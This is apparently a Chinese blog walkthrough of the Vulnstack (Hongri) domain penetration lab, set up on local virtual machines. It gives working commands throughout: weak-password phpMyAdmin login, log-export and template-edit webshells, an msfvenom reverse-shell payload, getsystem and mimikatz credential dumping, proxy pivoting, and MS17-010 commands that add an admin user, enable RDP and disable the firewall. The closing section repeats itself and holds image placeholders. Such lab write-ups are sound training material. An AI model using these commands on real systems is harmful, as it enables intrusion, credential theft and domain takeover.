搭建

靶場(chǎng)下載：

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G，需要百度網(wǎng)盤會(huì)員)

下載好靶場(chǎng)文件后直接解壓

直接用虛擬機(jī)打開靶場(chǎng)

更改網(wǎng)絡(luò)ip

需要模擬內(nèi)網(wǎng)和外網(wǎng)兩個(gè)網(wǎng)段， Win7 虛擬機(jī)相當(dāng)于網(wǎng)關(guān)服務(wù)器，所以需要兩張網(wǎng)卡，一個(gè)用來(lái)向外網(wǎng)提供web服務(wù)，一個(gè)是通向內(nèi)網(wǎng)

將 Win7 的網(wǎng)絡(luò)適配器 1 設(shè)置成 VMnet1 僅主機(jī)模式（內(nèi)網(wǎng)），網(wǎng)絡(luò)適配器 2 設(shè)置成 NAT 模式（外網(wǎng)）
而 Win2003、Win2008 網(wǎng)絡(luò)適配器設(shè)置成VMnet1僅主機(jī)模式(內(nèi)網(wǎng))。

網(wǎng)絡(luò)配置完成，這三臺(tái)虛擬主機(jī)默認(rèn)開機(jī)密碼都是 hongrisec@2019（開機(jī)提示密碼已過期，更改為 hongricse@2024即可，密碼太簡(jiǎn)單會(huì)設(shè)置錯(cuò)誤）

在之后可能會(huì)用到橋接模式，可以根據(jù)情況設(shè)置

在win7把環(huán)境啟動(dòng)，其中可以設(shè)置一個(gè)橋接模式，方便打靶

查看IP

訪問192.168.129.158

這幾臺(tái)機(jī)器都是有防火墻的，這里先看一下win7的防火墻和入站規(guī)則

接著可以在外面訪問一下192.168.129.158

到這里靶場(chǎng)就搭建成功了

開始打靶

攻擊機(jī) kali

web服務(wù)器 win7

域成員 win2003

域控 win2008

目的：先穿過防火墻打下web服務(wù)器接著再穿過防火墻拿下域內(nèi)的機(jī)器（域成員和域控）。

打靶方法：

• 端口掃描
• web路徑的發(fā)現(xiàn)
• phpmyadmin滲透

? 日志導(dǎo)出getshell

• yxcms滲透

? 編輯模板getshell

• 上線msf
• msf滲透利用
• msf psexec模板利用
• ms17_010_command模板利用

打靶

由于在打靶前知道了ip所以直接就不進(jìn)行信息收集了

直接來(lái)掃描端口

nmap -p- 192.168.129.158 -o result.txt/nmap -sV -Pn 192.168.129.158

有80和3306端口開放

phpmyadmin滲透

訪問192.168.129.158:80,得到的是一個(gè)phpstudy探針的頁(yè)面，可以知道絕對(duì)路徑

測(cè)試一下數(shù)據(jù)庫(kù)的連接情況，使用root/root弱口令，連接測(cè)試成功

使用dirsearch工具或者御劍掃描一下存在的web服務(wù)

[08:42:52] 200 - 71KB - /phpinfo.php

[08:42:52] 301 - 242B - /phpMyAdmin -> http://192.168.129.158/phpMyAdmin/

[08:42:52] 301 - 242B - /phpmyadmin -> http://192.168.129.158/phpmyadmin/

[08:42:53] 200 - 32KB - /phpmyadmin/ChangeLog

[08:42:53] 200 - 2KB - /phpmyadmin/README

[08:42:53] 200 - 4KB - /phpmyAdmin/

[08:42:53] 200 - 4KB - /phpMyAdmin/index.php

[08:42:53] 200 - 4KB - /phpMyadmin/

[08:42:53] 200 - 4KB - /phpmyadmin/

[08:42:53] 200 - 4KB - /phpmyadmin/index.php

[08:42:53] 200 - 4KB - /phpMyAdmin/

掃描到這么多文件，接著就是訪問

訪問 http://192.168.129.158/phpMyAdmin/

使用剛剛得到的弱口令進(jìn)行登錄root/root

日志導(dǎo)出getshell

查看日志導(dǎo)出

show variables like ‘general%’;

發(fā)現(xiàn)日志導(dǎo)出沒有打開，接著就要開啟日志導(dǎo)出

set global general_log=“ON”;

接著設(shè)置web路徑

set global general_log_file=“C:/phpStudy/www/404.php”;

執(zhí)行select 1；

訪問http://192.168.129.158/404.php查看日志

接著執(zhí)行select “<?php phpinfo();?>”;

接著刷新http://192.168.129.158/404.php查看日志的導(dǎo)出

以上幾步操作說(shuō)明web是可以用日志導(dǎo)出getshell的

最簡(jiǎn)單的就是可以寫入一句話木馬執(zhí)行，接著就可以用工具（蟻劍）連接到后臺(tái)，得到文件

yxcms滲透

訪問192.168.129.158/yxcms

查看網(wǎng)頁(yè)發(fā)現(xiàn)用戶和密碼

根據(jù)網(wǎng)頁(yè)提示訪問得到新的網(wǎng)頁(yè)

直接admin/123456登錄

成功登錄后臺(tái)

進(jìn)入前臺(tái)模板——>模板管理——>編輯文件

這里可以直接打開編輯寫入webshell

訪問http://192.168.129.158/yxcms/protected/apps/default/view/default/info.php 頁(yè)面什么都沒有顯示

使用hackbar，傳入剛剛寫入的phpinfo

接著用蟻劍連接

可以進(jìn)入文件管理和虛擬終端，在虛擬終端可以看到用戶名及身份

msf上線

先進(jìn)入msf工具使用頁(yè)面

在kali使用msf工具生成木馬文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.129.148 LPORT=4444 -f exe > 11.exe

成功將木馬文件上傳到web服務(wù)器

文件成功在終端顯示

在kali上開啟監(jiān)聽

? msfconsole #開啟msf

? use exploit/multi/handler

? set payload windows/meterpreter/reverse_tcp

? show options #可以查看一下寫的內(nèi)容

? set lhost 192.168.33.133 #ip寫kali的

? set lport 3333 #監(jiān)聽端口

? run #啟動(dòng)

設(shè)置好kali執(zhí)行文件，getshell

內(nèi)網(wǎng)信息收集

net time /domain #查看時(shí)間服務(wù)器

net user /domain #查看域用戶

net view /domain #查看有幾個(gè)域

net view /domain:GOD #查看GOD域情況

nslookup 主機(jī)名 #查看域內(nèi)其他主機(jī) 可能ip查不出來(lái)

net group “domain computers” /domain #查看域內(nèi)所有的主機(jī)名

net group “domain admins” /domain #查看域管理員

net group “domain controllers” /domain #查看域控

獲取目標(biāo)主機(jī)的shell

shell #進(jìn)入模擬終端

chcp 65001 #解決亂碼

route print # 打印路由信息

可知內(nèi)網(wǎng)網(wǎng)段應(yīng)該是 192.168.52.0/24

首先判斷是否在域中，域控制器一般集成了DNS服務(wù)，通過 ipconfig /all，即可簡(jiǎn)單判斷

域名為god.org,還可以使用下面這種方法查看

net view /domain #查詢當(dāng)前主機(jī)是否加入域，如果加入則列出域名

查看域內(nèi)信息

net config Workstation #查看計(jì)算機(jī)名、全名、用戶名、系統(tǒng)版本、工作站、域、登錄域

接著定位域控

域控的域名即 owa.god.org ，用 ping 即可反查出域控（server 2008）ip為192.168.52.138

再來(lái)看一下域內(nèi)的其它主機(jī)，OWA是域控，STU1是win7，所以剩下的就是域成員得到ip為192.168.52.141

再來(lái)看一下域管理員，可以看到這里我們獲得的 Administrator 就是域控OWA的域管理員

net group “domain admins” /domain #查詢域管理員

看一下域里有幾個(gè)用戶

net user /domain #查看域用戶，只有域管才能執(zhí)行

提權(quán)

getuid #查看服務(wù)器權(quán)限

getsystem #提權(quán)

getuid #查看是否提權(quán)成功

成功得到系統(tǒng)權(quán)限

獲取域用戶的密碼信息

方法一：加載 kiwi模塊

load kiwi #加載kiwi模塊

creds_all #列出所有憑據(jù)

方法二：加載mimikatz模塊，再嘗試加載 mimikatz 模塊，加載模塊前需要先將meterpreter遷移到64位的進(jìn)程

ps #查看進(jìn)程

migrate PID

load mimikatz

kiwi_cmd sekurlsa::logonpasswords

方法一不知道為什么一直顯示不出來(lái)

方法二：

ps

得到賬戶及登錄密碼，密碼和我一開始更改的一樣

目前為止，獲得的內(nèi)網(wǎng)信息有：

域名：god.org

域內(nèi)有五個(gè)用戶：Administrator、Guest、liukaifeng01、ligang、krbtgt

域內(nèi)三臺(tái)主機(jī)：OWA、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)

域控：OWA(192.168.52.138)

win7內(nèi)網(wǎng)ip：192.168.52.143

跨網(wǎng)段橫向滲透

msf添加代理

添加路由

run autoroute -s 192.168.52.0/24 #添加路由

run autoroute -p #查看路由信息

配置代理

background

use auxiliary/server/socks_proxy

set SRVHOST 127.0.0.1（這里因?yàn)槭潜緳C(jī)可以寫本地ip）

run

jobs

然后在 proxychains 的配置文件 /etc/proxychains.conf，添加本機(jī)的1080端口：

socks4 127.0.0.1 1080

域成員滲透

首先看下域成員開放的端口，全掃很久，這里只掃描一些高危端口

proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141

這里看見開著445端口，試著用一下ms17_010

use auxiliary/admin/smb/ms17_010_command

set COMMAND net user

set RHOST 192.168.52.141

run

添加一個(gè)用戶嘗試遠(yuǎn)程登錄一下

還是使用這個(gè)模塊，依次執(zhí)行下面命令

set command net user bbb qwer@123 /add #添加用戶

run

set command net localgroup administrators bbb /add #管理員權(quán)限

run

set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ #開啟3389端口

run

set command netsh advfirewall set allprofiles state off #關(guān)閉防火墻

run

接著遠(yuǎn)程登錄

proxychains rdesktop 192.168.52.141

使用剛剛添加的新用戶進(jìn)行登錄，而且原來(lái)的用戶賬戶及密碼也拿到了

對(duì)于另一臺(tái)機(jī)器192.168.52.138的獲取也是一樣的操作

先連接創(chuàng)建新用戶，賦予其權(quán)限

Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ #開啟3389端口

run

set command netsh advfirewall set allprofiles state off #關(guān)閉防火墻

run

[外鏈圖片轉(zhuǎn)存中…(img-DoUuluZW-1734439783074)][外鏈圖片轉(zhuǎn)存中…(img-pquuSHzj-1734439783074)][外鏈圖片轉(zhuǎn)存中…(img-QvoP0AOc-1734439783074)]接著遠(yuǎn)程登錄

proxychains rdesktop 192.168.52.141

使用剛剛添加的新用戶進(jìn)行登錄，而且原來(lái)的用戶賬戶及密碼也拿到了

對(duì)于另一臺(tái)機(jī)器192.168.52.138的獲取也是一樣的操作

先連接創(chuàng)建新用戶，賦予其權(quán)限

然后直接遠(yuǎn)程登錄